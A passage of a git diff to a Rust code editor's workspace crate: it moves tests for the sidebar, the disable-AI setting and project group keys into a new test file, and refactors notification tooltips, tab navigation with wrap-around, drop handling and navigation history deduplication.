cx| { - DisableAiSettings::override_global(DisableAiSettings { disable_ai: true }, cx); - }); - cx.run_until_parked(); - - multi_workspace.read_with(cx, |mw, cx| { - assert!( - !mw.is_sidebar_open(), - "Sidebar should be closed when disable_ai is true" - ); - assert!( - !mw.multi_workspace_enabled(cx), - "Multi-workspace should be disabled when disable_ai is true" - ); - }); - - multi_workspace.update_in(cx, |mw, window, cx| { - mw.toggle_sidebar(window, cx); - }); - multi_workspace.read_with(cx, |mw, _cx| { - assert!( - !mw.is_sidebar_open(), - "Sidebar should remain closed when toggled 
with disable_ai true" - ); - }); - - cx.update(|_window, cx| { - DisableAiSettings::override_global(DisableAiSettings { disable_ai: false }, cx); - }); - cx.run_until_parked(); - - multi_workspace.read_with(cx, |mw, cx| { - assert!( - mw.multi_workspace_enabled(cx), - "Multi-workspace should be enabled after re-enabling AI" - ); - assert!( - !mw.is_sidebar_open(), - "Sidebar should still be closed after re-enabling AI (not auto-opened)" - ); - }); - - multi_workspace.update_in(cx, |mw, window, cx| { - mw.toggle_sidebar(window, cx); - }); - multi_workspace.read_with(cx, |mw, _cx| { - assert!( - mw.is_sidebar_open(), - "Sidebar should open when toggled after re-enabling AI" - ); - }); - } -} diff --git a/crates/workspace/src/multi_workspace_tests.rs b/crates/workspace/src/multi_workspace_tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..ab6ca43d5aff482b637add9083b1ad9d388d7993 --- /dev/null +++ b/crates/workspace/src/multi_workspace_tests.rs @@ -0,0 +1,343 @@ +use super::*; +use feature_flags::FeatureFlagAppExt; +use fs::FakeFs; +use gpui::TestAppContext; +use project::{DisableAiSettings, ProjectGroupKey}; +use serde_json::json; +use settings::SettingsStore; + +fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + DisableAiSettings::register(cx); + cx.update_flags(false, vec!["agent-v2".into()]); + }); +} + +#[gpui::test] +async fn test_sidebar_disabled_when_disable_ai_is_enabled(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + multi_workspace.read_with(cx, |mw, cx| { + assert!(mw.multi_workspace_enabled(cx)); + }); + + multi_workspace.update_in(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + 
assert!(mw.sidebar_open()); + }); + + cx.update(|_window, cx| { + DisableAiSettings::override_global(DisableAiSettings { disable_ai: true }, cx); + }); + cx.run_until_parked(); + + multi_workspace.read_with(cx, |mw, cx| { + assert!( + !mw.sidebar_open(), + "Sidebar should be closed when disable_ai is true" + ); + assert!( + !mw.multi_workspace_enabled(cx), + "Multi-workspace should be disabled when disable_ai is true" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + multi_workspace.read_with(cx, |mw, _cx| { + assert!( + !mw.sidebar_open(), + "Sidebar should remain closed when toggled with disable_ai true" + ); + }); + + cx.update(|_window, cx| { + DisableAiSettings::override_global(DisableAiSettings { disable_ai: false }, cx); + }); + cx.run_until_parked(); + + multi_workspace.read_with(cx, |mw, cx| { + assert!( + mw.multi_workspace_enabled(cx), + "Multi-workspace should be enabled after re-enabling AI" + ); + assert!( + !mw.sidebar_open(), + "Sidebar should still be closed after re-enabling AI (not auto-opened)" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + multi_workspace.read_with(cx, |mw, _cx| { + assert!( + mw.sidebar_open(), + "Sidebar should open when toggled after re-enabling AI" + ); + }); +} + +#[gpui::test] +async fn test_project_group_keys_initial(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref()], cx).await; + + let expected_key = project.read_with(cx, |project, cx| project.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); 
+ assert_eq!(keys.len(), 1, "should have exactly one key on creation"); + assert_eq!(*keys[0], expected_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_add_workspace(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + let project_b = Project::test(fs.clone(), ["/root_b".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_b = project_b.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + key_a, key_b, + "different roots should produce different keys" + ); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + assert_eq!(mw.project_group_keys().count(), 1); + }); + + // Adding a workspace with a different project root adds a new key. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should have two keys after adding a second workspace" + ); + assert_eq!(*keys[0], key_a); + assert_eq!(*keys[1], key_b); + }); +} + +#[gpui::test] +async fn test_project_group_keys_duplicate_not_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + // A second project entity pointing at the same path produces the same key. 
+ let project_a2 = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_a2 = project_a2.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_eq!(key_a, key_a2, "same root path should produce the same key"); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_a2, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 1, + "duplicate key should not be added when a workspace with the same root is inserted" + ); + }); +} + +#[gpui::test] +async fn test_project_group_keys_on_worktree_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref()], cx).await; + + let initial_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + // Add a second worktree to the same project. 
+ let (worktree, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/root_b", true, cx) + }) + .await + .unwrap(); + worktree + .read_with(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + let updated_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + initial_key, updated_key, + "key should change after adding a worktree" + ); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should have both the original and updated key" + ); + assert_eq!(*keys[0], initial_key); + assert_eq!(*keys[1], updated_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_on_worktree_removed(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref(), "/root_b".as_ref()], cx).await; + + let initial_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + // Remove one worktree. 
+ let worktree_b_id = project.read_with(cx, |project, cx| { + project + .worktrees(cx) + .find(|wt| wt.read(cx).root_name().as_unix_str() == "root_b") + .unwrap() + .read(cx) + .id() + }); + project.update(cx, |project, cx| { + project.remove_worktree(worktree_b_id, cx); + }); + cx.run_until_parked(); + + let updated_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + initial_key, updated_key, + "key should change after removing a worktree" + ); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should accumulate both the original and post-removal key" + ); + assert_eq!(*keys[0], initial_key); + assert_eq!(*keys[1], updated_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_across_multiple_workspaces_and_worktree_changes( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_c", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + let project_b = Project::test(fs.clone(), ["/root_b".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_b = project_b.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + assert_eq!(mw.project_group_keys().count(), 2); + }); + + // Now add a worktree to project_a. This should produce a third key. 
+ let (worktree, _) = project_a + .update(cx, |project, cx| { + project.find_or_create_worktree("/root_c", true, cx) + }) + .await + .unwrap(); + worktree + .read_with(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + let key_a_updated = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!(key_a, key_a_updated); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 3, + "should have key_a, key_b, and the updated key_a with root_c" + ); + assert_eq!(*keys[0], key_a); + assert_eq!(*keys[1], key_b); + assert_eq!(*keys[2], key_a_updated); + }); +} diff --git a/crates/workspace/src/notifications.rs b/crates/workspace/src/notifications.rs index 84f479b77e4f0274e0775353d3a7cd5579768f1c..ce54765e3ff81fde015d465d18b03cea44bbbe8f 100644 --- a/crates/workspace/src/notifications.rs +++ b/crates/workspace/src/notifications.rs @@ -5,11 +5,11 @@ use gpui::{ DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, Render, ScrollHandle, Task, TextStyleRefinement, UnderlineStyle, WeakEntity, svg, }; -use markdown::{Markdown, MarkdownElement, MarkdownStyle}; +use markdown::{CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use parking_lot::Mutex; use project::project_settings::ProjectSettings; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use std::ops::Deref; use std::sync::{Arc, LazyLock}; @@ -234,6 +234,14 @@ impl Workspace { self.suppressed_notifications.insert(id.clone()); } + pub fn is_notification_suppressed(&self, notification_id: NotificationId) -> bool { + self.suppressed_notifications.contains(¬ification_id) + } + + pub fn unsuppress(&mut self, notification_id: NotificationId) { + self.suppressed_notifications.remove(¬ification_id); + } + pub fn show_initial_notifications(&mut self, cx: &mut Context) { // Allow absence of the global so that tests 
don't need to initialize it. let app_notifications = GLOBAL_APP_NOTIFICATIONS @@ -393,8 +401,7 @@ impl Render for LanguageServerPrompt { MarkdownElement::new(self.markdown.clone(), markdown_style(window, cx)) .text_size(TextSize::Small.rems(cx)) .code_block_renderer(markdown::CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::Hidden, border: false, }) .on_url_click(|link, _, cx| cx.open_url(&link)), @@ -657,15 +664,17 @@ impl RenderOnce for NotificationFrame { IconButton::new(close_id, close_icon) .tooltip(move |_window, cx| { if suppress { - Tooltip::for_action( - "Suppress.\nClose with click.", - &SuppressNotification, + Tooltip::with_meta( + "Suppress", + Some(&SuppressNotification), + "Click to Close", cx, ) } else if show_suppress_button { - Tooltip::for_action( - "Close.\nSuppress with shift-click.", - &menu::Cancel, + Tooltip::with_meta( + "Close", + Some(&menu::Cancel), + "Shift-click to Suppress", cx, ) } else { @@ -915,11 +924,11 @@ pub mod simple_message_notification { })); if let Some(icon) = self.primary_icon { - button = button - .icon(icon) - .icon_color(self.primary_icon_color.unwrap_or(Color::Muted)) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small); + button = button.start_icon( + Icon::new(icon) + .size(IconSize::Small) + .color(self.primary_icon_color.unwrap_or(Color::Muted)), + ); } button @@ -935,11 +944,11 @@ pub mod simple_message_notification { })); if let Some(icon) = self.secondary_icon { - button = button - .icon(icon) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) - .icon_color(self.secondary_icon_color.unwrap_or(Color::Muted)); + button = button.start_icon( + Icon::new(icon) + .size(IconSize::Small) + .color(self.secondary_icon_color.unwrap_or(Color::Muted)), + ); } button @@ -953,9 +962,11 @@ pub mod simple_message_notification { let url = url.clone(); Button::new(message.clone(), message.clone()) 
.label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Indicator) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Indicator) + .color(Color::Muted), + ) .on_click(cx.listener(move |_, _, _, cx| { cx.open_url(&url); })) @@ -1215,10 +1226,8 @@ where let mut display = format!("{err:#}"); if !display.ends_with('\n') { display.push('.'); - display.push(' ') } - let detail = - f(err, window, cx).unwrap_or_else(|| format!("{display}Please try again.")); + let detail = f(err, window, cx).unwrap_or(display); window.prompt(PromptLevel::Critical, &msg, Some(&detail), &["Ok"], cx) }) { prompt.await.ok(); diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index 66e5eeb4734557c818f42b6537859634435fd295..27cc96ae80a010db2dd5357a9a0bc037ca762875 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -2,6 +2,7 @@ use crate::{ CloseWindow, NewFile, NewTerminal, OpenInTerminal, OpenOptions, OpenTerminal, OpenVisible, SplitDirection, ToggleFileFinder, ToggleProjectSymbols, ToggleZoom, Workspace, WorkspaceItemBuilder, ZoomIn, ZoomOut, + focus_follows_mouse::FocusFollowsMouse as _, invalid_item_view::InvalidItemView, item::{ ActivateOnClose, ClosePosition, Item, ItemBufferKind, ItemHandle, ItemSettings, @@ -11,7 +12,7 @@ use crate::{ move_item, notifications::NotifyResultExt, toolbar::Toolbar, - workspace_settings::{AutosaveSetting, TabBarSettings, WorkspaceSettings}, + workspace_settings::{AutosaveSetting, FocusFollowsMouse, TabBarSettings, WorkspaceSettings}, }; use anyhow::Result; use collections::{BTreeSet, HashMap, HashSet, VecDeque}; @@ -34,7 +35,6 @@ use std::{ any::Any, cmp, fmt, mem, num::NonZeroUsize, - ops::ControlFlow, path::PathBuf, rc::Rc, sync::{ @@ -43,13 +43,15 @@ use std::{ }, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ ContextMenu, ContextMenuEntry, ContextMenuItem, DecoratedIcon, IconButtonShape, 
IconDecoration, IconDecorationKind, Indicator, PopoverMenu, PopoverMenuHandle, Tab, TabBar, TabPosition, Tooltip, prelude::*, right_click_menu, }; -use util::{ResultExt, debug_panic, maybe, paths::PathStyle, truncate_and_remove_front}; +use util::{ + ResultExt, debug_panic, maybe, paths::PathStyle, serde::default_true, truncate_and_remove_front, +}; /// A selected entry in e.g. project panel. #[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] @@ -230,13 +232,41 @@ split_structs!( SplitVertical => "Splits the pane vertically." ); +/// Activates the previous item in the pane. +#[derive(Clone, PartialEq, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = pane)] +#[serde(deny_unknown_fields, default)] +pub struct ActivatePreviousItem { + /// Whether to wrap from the first item to the last item. + #[serde(default = "default_true")] + pub wrap_around: bool, +} + +impl Default for ActivatePreviousItem { + fn default() -> Self { + Self { wrap_around: true } + } +} + +/// Activates the next item in the pane. +#[derive(Clone, PartialEq, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = pane)] +#[serde(deny_unknown_fields, default)] +pub struct ActivateNextItem { + /// Whether to wrap from the last item to the first item. + #[serde(default = "default_true")] + pub wrap_around: bool, +} + +impl Default for ActivateNextItem { + fn default() -> Self { + Self { wrap_around: true } + } +} + actions!( pane, [ - /// Activates the previous item in the pane. - ActivatePreviousItem, - /// Activates the next item in the pane. - ActivateNextItem, /// Activates the last item in the pane. ActivateLastItem, /// Switches to the alternate file. 
@@ -382,9 +412,6 @@ pub struct Pane { project: WeakEntity, pub drag_split_direction: Option, can_drop_predicate: Option bool>>, - custom_drop_handle: Option< - Arc) -> ControlFlow<(), ()>>, - >, can_split_predicate: Option) -> bool>>, can_toggle_zoom: bool, @@ -417,6 +444,7 @@ pub struct Pane { pinned_tab_count: usize, diagnostics: HashMap, zoom_out_on_close: bool, + focus_follows_mouse: FocusFollowsMouse, diagnostic_summary_update: Task<()>, /// If a certain project item wants to get recreated with specific data, it can persist its data before the recreation here. pub project_item_restoration_data: HashMap>, @@ -477,6 +505,9 @@ pub struct NavigationEntry { pub data: Option>, pub timestamp: usize, pub is_preview: bool, + /// Row position for Neovim-style deduplication. When set, entries with the + /// same item and row are considered duplicates and deduplicated. + pub row: Option, } #[derive(Clone)] @@ -567,7 +598,6 @@ impl Pane { workspace, project: project.downgrade(), can_drop_predicate, - custom_drop_handle: None, can_split_predicate: None, can_toggle_zoom: true, should_display_tab_bar: Rc::new(|_, cx| TabBarSettings::get_global(cx).show), @@ -587,6 +617,7 @@ impl Pane { pinned_tab_count: 0, diagnostics: Default::default(), zoom_out_on_close: true, + focus_follows_mouse: WorkspaceSettings::get_global(cx).focus_follows_mouse, diagnostic_summary_update: Task::ready(()), project_item_restoration_data: HashMap::default(), welcome_page: None, @@ -754,7 +785,6 @@ impl Pane { fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { let tab_bar_settings = TabBarSettings::get_global(cx); - let new_max_tabs = WorkspaceSettings::get_global(cx).max_tabs; if let Some(display_nav_history_buttons) = self.display_nav_history_buttons.as_mut() { *display_nav_history_buttons = tab_bar_settings.show_nav_history_buttons; @@ -767,6 +797,12 @@ impl Pane { self.nav_history.0.lock().preview_item_id = None; } + let workspace_settings = WorkspaceSettings::get_global(cx); + 
+ self.focus_follows_mouse = workspace_settings.focus_follows_mouse; + + let new_max_tabs = workspace_settings.max_tabs; + if self.use_max_tabs && new_max_tabs != self.max_tabs { self.max_tabs = new_max_tabs; self.close_items_on_settings_change(window, cx); @@ -846,15 +882,6 @@ impl Pane { cx.notify(); } - pub fn set_custom_drop_handle(&mut self, cx: &mut Context, handle: F) - where - F: 'static - + Fn(&mut Pane, &dyn Any, &mut Window, &mut Context) -> ControlFlow<(), ()>, - { - self.custom_drop_handle = Some(Arc::new(handle)); - cx.notify(); - } - pub fn nav_history_for_item(&self, item: &Entity) -> ItemNavHistory { ItemNavHistory { history: self.nav_history.clone(), @@ -1468,7 +1495,8 @@ impl Pane { fn update_active_tab(&mut self, index: usize) { if !self.is_tab_pinned(index) { self.suppress_scroll = false; - self.tab_bar_scroll_handle.scroll_to_item(index); + self.tab_bar_scroll_handle + .scroll_to_item(index - self.pinned_tab_count); } } @@ -1487,14 +1515,14 @@ impl Pane { pub fn activate_previous_item( &mut self, - _: &ActivatePreviousItem, + action: &ActivatePreviousItem, window: &mut Window, cx: &mut Context, ) { let mut index = self.active_item_index; if index > 0 { index -= 1; - } else if !self.items.is_empty() { + } else if action.wrap_around && !self.items.is_empty() { index = self.items.len() - 1; } self.activate_item(index, true, true, window, cx); @@ -1502,14 +1530,14 @@ impl Pane { pub fn activate_next_item( &mut self, - _: &ActivateNextItem, + action: &ActivateNextItem, window: &mut Window, cx: &mut Context, ) { let mut index = self.active_item_index; if index + 1 < self.items.len() { index += 1; - } else { + } else if action.wrap_around { index = 0; } self.activate_item(index, true, true, window, cx); @@ -2859,12 +2887,13 @@ impl Pane { })) .on_aux_click( cx.listener(move |pane: &mut Self, event: &ClickEvent, window, cx| { - if !event.is_middle_click() { + if !event.is_middle_click() || is_pinned { return; } pane.close_item_by_id(item_id, 
SaveIntent::Close, window, cx) .detach_and_log_err(cx); + cx.stop_propagation(); }), ) .on_drag( @@ -2900,7 +2929,7 @@ impl Pane { .on_drop( cx.listener(move |this, dragged_tab: &DraggedTab, window, cx| { this.drag_split_direction = None; - this.handle_tab_drop(dragged_tab, ix, window, cx) + this.handle_tab_drop(dragged_tab, ix, false, window, cx) }), ) .on_drop( @@ -3205,6 +3234,7 @@ impl Pane { }); let entry_abs_path = pane.read(cx).entry_abs_path(entry, cx); + let reveal_path = entry_abs_path.clone(); let parent_abs_path = entry_abs_path .as_deref() .and_then(|abs_path| Some(abs_path.parent()?.to_path_buf())); @@ -3214,6 +3244,15 @@ impl Pane { let visible_in_project_panel = relative_path.is_some() && worktree.is_some_and(|worktree| worktree.read(cx).is_visible()); + let is_local = pane.read(cx).project.upgrade().is_some_and(|project| { + let project = project.read(cx); + project.is_local() || project.is_via_wsl_with_host_interop(cx) + }); + let is_remote = pane + .read(cx) + .project + .upgrade() + .is_some_and(|project| project.read(cx).is_remote()); let entry_id = entry.to_proto(); @@ -3246,8 +3285,26 @@ impl Pane { }), ) }) + .when(is_local, |menu| { + menu.when_some(reveal_path, |menu, reveal_path| { + menu.separator().entry( + ui::utils::reveal_in_file_manager_label(is_remote), + Some(Box::new( + zed_actions::editor::RevealInFileManager, + )), + window.handler_for(&pane, move |pane, _, cx| { + if let Some(project) = pane.project.upgrade() { + project.update(cx, |project, cx| { + project.reveal_path(&reveal_path, cx); + }); + } else { + cx.reveal_path(&reveal_path); + } + }), + ) + }) + }) .map(pin_tab_entries) - .separator() .when(visible_in_project_panel, |menu| { menu.entry( "Reveal In Project Panel", @@ -3449,7 +3506,7 @@ impl Pane { cx, ) .children(pinned_tabs.len().ne(&0).then(|| { - let max_scroll = self.tab_bar_scroll_handle.max_offset().width; + let max_scroll = self.tab_bar_scroll_handle.max_offset().x; // We need to check both because offset 
returns delta values even when the scroll handle is not scrollable let is_scrolled = self.tab_bar_scroll_handle.offset().x < px(0.); // Avoid flickering when max_offset is very small (< 2px). @@ -3549,7 +3606,7 @@ impl Pane { .on_drop( cx.listener(move |this, dragged_tab: &DraggedTab, window, cx| { this.drag_split_direction = None; - this.handle_tab_drop(dragged_tab, this.items.len(), window, cx) + this.handle_tab_drop(dragged_tab, this.items.len(), false, window, cx) }), ) .on_drop( @@ -3613,6 +3670,11 @@ impl Pane { this.drag_split_direction = None; this.handle_external_paths_drop(paths, window, cx) })) + .on_click(cx.listener(move |this, event: &ClickEvent, window, cx| { + if event.click_count() == 2 { + window.dispatch_action(this.double_click_dispatch_action.boxed_clone(), cx); + } + })) } pub fn render_menu_overlay(menu: &Entity) -> Div { @@ -3690,14 +3752,18 @@ impl Pane { &mut self, dragged_tab: &DraggedTab, ix: usize, + is_pane_target: bool, window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, dragged_tab, window, cx) + if is_pane_target + && ix == self.active_item_index + && let Some(active_item) = self.active_item() + && active_item.handle_drop(self, dragged_tab, window, cx) { return; } + let mut to_pane = cx.entity(); let split_direction = self.drag_split_direction; let item_id = dragged_tab.item.item_id(); @@ -3790,7 +3856,7 @@ impl Pane { let item_id = dragged_tab.item.item_id(); let pinned_count = self.pinned_tab_count; - self.handle_tab_drop(dragged_tab, pinned_count, window, cx); + self.handle_tab_drop(dragged_tab, pinned_count, false, window, cx); let to_pane = cx.entity(); @@ -3842,11 +3908,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, dragged_selection, window, cx) + if let Some(active_item) 
= self.active_item() + && active_item.handle_drop(self, dragged_selection, window, cx) { return; } + self.handle_project_entry_drop( &dragged_selection.active_selection.entry_id, dragged_onto, @@ -3862,11 +3929,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, project_entry_id, window, cx) + if let Some(active_item) = self.active_item() + && active_item.handle_drop(self, project_entry_id, window, cx) { return; } + let mut to_pane = cx.entity(); let split_direction = self.drag_split_direction; let project_entry_id = *project_entry_id; @@ -3938,11 +4006,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, paths, window, cx) + if let Some(active_item) = self.active_item() + && active_item.handle_drop(self, paths, window, cx) { return; } + let mut to_pane = cx.entity(); let mut split_direction = self.drag_split_direction; let paths = paths.paths().to_vec(); @@ -4404,6 +4473,7 @@ impl Render for Pane { placeholder.child(self.welcome_page.clone().unwrap()) } } + .focus_follows_mouse(self.focus_follows_mouse, cx) }) .child( // drag target @@ -4423,6 +4493,7 @@ impl Render for Pane { this.handle_tab_drop( dragged_tab, this.active_item_index(), + true, window, cx, ) @@ -4487,7 +4558,12 @@ impl Render for Pane { } impl ItemNavHistory { - pub fn push(&mut self, data: Option, cx: &mut App) { + pub fn push( + &mut self, + data: Option, + row: Option, + cx: &mut App, + ) { if self .item .upgrade() @@ -4495,7 +4571,7 @@ impl ItemNavHistory { { let is_preview_item = self.history.0.lock().preview_item_id == Some(self.item.id()); self.history - .push(data, self.item.clone(), is_preview_item, cx); + .push(data, self.item.clone(), is_preview_item, row, cx); } } @@ -4503,9 +4579,10 @@ impl ItemNavHistory { let 
is_preview_item = self.history.0.lock().preview_item_id == Some(self.item.id()); NavigationEntry { item: self.item.clone(), - data: data, - timestamp: 0, // not used + data, + timestamp: 0, is_preview: is_preview_item, + row: None, } } @@ -4609,12 +4686,22 @@ impl NavHistory { data: Option, item: Arc, is_preview: bool, + row: Option, cx: &mut App, ) { let state = &mut *self.0.lock(); + let new_item_id = item.id(); + + let is_same_location = + |entry: &NavigationEntry| entry.item.id() == new_item_id && entry.row == row; + match state.mode { NavigationMode::Disabled => {} NavigationMode::Normal | NavigationMode::ReopeningClosedItem => { + state + .backward_stack + .retain(|entry| !is_same_location(entry)); + if state.backward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.backward_stack.pop_front(); } @@ -4623,10 +4710,13 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); state.forward_stack.clear(); } NavigationMode::GoingBack => { + state.forward_stack.retain(|entry| !is_same_location(entry)); + if state.forward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.forward_stack.pop_front(); } @@ -4635,9 +4725,14 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } NavigationMode::GoingForward => { + state + .backward_stack + .retain(|entry| !is_same_location(entry)); + if state.backward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.backward_stack.pop_front(); } @@ -4646,6 +4741,7 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } NavigationMode::ClosingItem if is_preview => return, @@ -4658,6 +4754,7 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } } 
